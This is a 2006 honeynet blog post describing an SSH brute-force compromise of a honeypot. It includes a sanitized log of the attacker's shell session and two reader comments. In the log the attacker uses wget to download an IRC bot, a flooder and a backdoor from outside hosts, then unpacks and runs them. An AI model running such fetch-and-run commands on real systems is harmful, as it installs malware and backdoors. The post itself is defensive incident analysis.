< New contributor: David Watson | Low-Interaction Honeyclient >

Honeypot Compromise: SSH Bruteforcing

About one month ago we had another compromise of one of our honeypots. The attacker came from the IP 71.116.213.XXX (static-71-116-213-XXX.lsanca.dsl-w.verizon.net), which is located in California, US (according to MaxMind). Later on he also used an IP located in Romania.

The compromise was not very interesting: the attacker used a tool for SSH bruteforcing and was able to guess the weak password of one user. He then installed an IRC bot and a backdoor on the compromised machine. Please find below the sanitized logging output of Sebek:

12:12:48	w

12:12:50	uname -a

12:12:54	passwd

12:12:43	w

12:12:53	ls

12:12:54	cd /tmp

12:12:55	ls

12:12:57	cd /var/tmp

12:12:57	ls

12:12:08	wget http://www.members.lycos.co.uk/XXX/mech.tar

12:12:15	wget http://free.7host06.com/XXX/linuxteam.tar.gz

12:12:29	wget http://free.7host06.com/XXX/flood

12:12:00	ls

12:12:04	tar zxvf mech.tar

12:12:06	cd mech

12:12:06	ls

12:12:10	pico mech1.users

12:12:12	nano mech1.users

12:12:16	mcedit mech1.users

12:12:19	vi mech1.users

[...]

12:12:07	vi kswap.set

[...]

12:12:28	./inetd
This entry was posted by Thorsten Holz on Monday, October 30. 2006 at 19:52. and is filed under honeynets. You can leave a response, or trackback from your own blog. All new comments are subject to moderation before being displayed.

Trackbacks

Trackback specific URI for this entry

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

  1. Konrad says:
    #1 2006-10-30 21:45 (Reply)

    That's a nice log.

    "Let's edit a file, pico? Hmm, nano? Oh, well then mcedit? Damn, not vi again!"

  2. Landon Lewis says:
    #2 2006-10-30 23:55 (Reply)

    And lastly he used vi to edit his config files. Nothing too "automated" like some echo'd out configs or something. =)


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.